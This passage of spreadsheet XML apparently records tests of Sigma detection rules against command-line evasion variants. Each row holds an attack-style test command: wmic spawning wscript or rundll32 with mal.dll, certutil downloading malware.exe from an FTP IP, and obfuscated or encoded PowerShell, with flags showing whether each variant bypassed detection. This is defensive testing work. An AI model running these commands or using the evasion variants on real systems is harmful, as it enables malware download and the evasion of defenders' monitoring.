          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3063" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3063" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3063" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3063" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3063" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3063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063" s="43" t="n"/>
      <c r="K3063" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3064" ht="15.75" customHeight="1" s="42">
      <c r="A3064" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3064" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3064" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3064" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3064" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe -"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3064" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3064" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3064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064" s="43" t="n"/>
      <c r="K3064" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3065" ht="15.75" customHeight="1" s="42">
      <c r="A3065" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3065" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3065" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3065" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3065" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F3065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3065" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3065" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3065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065" s="43" t="n"/>
      <c r="K3065" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3066" ht="15.75" customHeight="1" s="42">
      <c r="A3066" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3066" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3066" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3066" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3066" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /u"</t>
        </is>
      </c>
      <c r="F3066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3066" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3066" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3066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6" s="43" t="n"/>
      <c r="K3066" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3067" ht="15.75" customHeight="1" s="42">
      <c r="A3067" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3067" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3067" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3067" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3067" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F3067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3067" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3067" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3067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7" s="43" t="n"/>
      <c r="K3067" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3068" ht="15.75" customHeight="1" s="42">
      <c r="A3068" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3068" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3068" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3068" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3068" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F3068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3068" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3068" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3068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8" s="43" t="n"/>
      <c r="K3068" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3069" ht="15.75" customHeight="1" s="42">
      <c r="A3069" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3069" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3069" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3069" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3069" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /"n" /u"</t>
        </is>
      </c>
      <c r="F3069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3069" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3069" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3069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69" s="43" t="n"/>
      <c r="K3069" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3070" ht="15.75" customHeight="1" s="42">
      <c r="A3070" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3070" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3070" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3070" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3070" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /u"</t>
        </is>
      </c>
      <c r="F3070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3070" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3070" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3070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0" s="43" t="n"/>
      <c r="K3070" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3071" ht="15.75" customHeight="1" s="42">
      <c r="A3071" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3071" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3071" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3071" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3071" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /N /U"</t>
        </is>
      </c>
      <c r="F3071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3071" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3071" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3071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1" s="43" t="n"/>
      <c r="K3071" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3072" ht="15.75" customHeight="1" s="42">
      <c r="A3072" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3072" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3072" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3072" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3072" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" -"n" /U"</t>
        </is>
      </c>
      <c r="F3072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3072" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3072" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3072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2" s="43" t="n"/>
      <c r="K3072" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3073" ht="15.75" customHeight="1" s="42">
      <c r="A3073" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3073" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3073" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3073" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3073" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer -"s" /N /u"</t>
        </is>
      </c>
      <c r="F3073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3073" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3073" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3073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3" s="43" t="n"/>
      <c r="K3073" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3074" ht="15.75" customHeight="1" s="42">
      <c r="A3074" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3074" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3074" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3074" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3074" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F3074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3074" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3074" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3074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4" s="43" t="n"/>
      <c r="K3074" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3075" ht="15.75" customHeight="1" s="42">
      <c r="A3075" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3075" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3075" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3075" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3075" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F3075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3075" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3075" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3075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5" s="43" t="n"/>
      <c r="K3075" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3076" ht="15.75" customHeight="1" s="42">
      <c r="A3076" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B3076" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3076" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3076" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3076" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F3076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3076" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3076" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3076" s="43" t="inlineStr">
        <is>
          <t>Potential Renamed Rundll32 Execution (2569ed8c-1147-498a-9b8c-2ad3656b10ed); Potential Renamed Rundll32 Execution (2569ed8c-1147-498a-9b8c-2ad3656b10ed); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J3076" s="43" t="n"/>
      <c r="K3076" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3077" ht="15.75" customHeight="1" s="42">
      <c r="A3077" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B3077" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C3077" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3077" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E3077" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -SpLIT -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F3077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3077" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3077" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3077" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829)</t>
        </is>
      </c>
      <c r="J3077" s="43" t="n"/>
      <c r="K3077" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3078" ht="15.75" customHeight="1" s="42">
      <c r="A3078" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B3078" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C3078" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3078" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E3078" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -UrLCACHe -"split" -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F3078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3078" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3078" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3078" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829)</t>
        </is>
      </c>
      <c r="J3078" s="43" t="n"/>
      <c r="K3078" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3079" ht="15.75" customHeight="1" s="42">
      <c r="A3079" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B3079" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_download</t>
        </is>
      </c>
      <c r="C3079" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D3079" s="43" t="inlineStr">
        <is>
          <t>19b08b1c-861d-4e75-a1ef-ea0c1baf202b</t>
        </is>
      </c>
      <c r="E3079" s="43" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -split -f ftp://192.168.1.100/malware.exe C:\ emp\malware.exe</t>
        </is>
      </c>
      <c r="F3079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3079" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3079" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3079" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From Direct IP Via Certutil.EXE (13e6fe51-d478-4c7e-b0f2-6da9b400a829)</t>
        </is>
      </c>
      <c r="J3079" s="43" t="n"/>
      <c r="K3079" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3080" ht="15.75" customHeight="1" s="42">
      <c r="A3080" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3080" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3080" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3080" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3080" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a = 'j'; $b = 'o'; $c = 'i'; $d = 'n'; $e = 's'; $f = 'p'; $g = 'l'; $h = 'i'; $i = 't'; $cmd = $a+$b+$c+$d+' '+$e+$f+$g+$h+$i; Invoke-Expression ('Write-Host ' + $cmd)"</t>
        </is>
      </c>
      <c r="F3080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3080" s="43" t="n"/>
      <c r="J3080" s="43" t="n"/>
      <c r="K3080" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3081" ht="15.75" customHeight="1" s="42">
      <c r="A3081" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3081" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3081" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3081" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3081" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3081" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3081" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3081" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3081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081" s="43" t="n"/>
      <c r="K3081" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3082" ht="15.75" customHeight="1" s="42">
      <c r="A3082" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3082" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3082" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3082" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3082" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3082" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3082" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3082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082" s="43" t="n"/>
      <c r="K3082" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3083" ht="15.75" customHeight="1" s="42">
      <c r="A3083" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3083" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3083" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3083" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3083" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDEdcomMAnD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3083" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3083" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I308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083" s="43" t="n"/>
      <c r="K3083" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3084" ht="15.75" customHeight="1" s="42">
      <c r="A3084" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3084" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3084" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3084" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3084" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3084" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3084" s="43" t="n"/>
      <c r="J3084" s="43" t="n"/>
      <c r="K3084" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3085" ht="15.75" customHeight="1" s="42">
      <c r="A3085" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3085" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3085" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3085" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3085" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3085" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3085" s="43" t="n"/>
      <c r="J3085" s="43" t="n"/>
      <c r="K3085" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3086" ht="15.75" customHeight="1" s="42">
      <c r="A3086" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3086" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3086" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3086" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3086" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdEdcoMManD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3086" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3086" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3086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086" s="43" t="n"/>
      <c r="K3086" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3087" ht="15.75" customHeight="1" s="42">
      <c r="A3087" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3087" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3087" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3087" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3087" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDEDcommaND JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F3087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3087" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3087" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3087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3087" s="43" t="n"/>
      <c r="K3087" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3088" ht="15.75" customHeight="1" s="42">
      <c r="A3088" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3088" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3088" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3088" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3088" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F3088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3088" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3088" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3088" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J3088" s="43" t="n"/>
      <c r="K3088" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3089" ht="15.75" customHeight="1" s="42">
      <c r="A3089" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B3089" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C3089" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D3089" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E3089" s="43" t="inlineStr">
        <is>
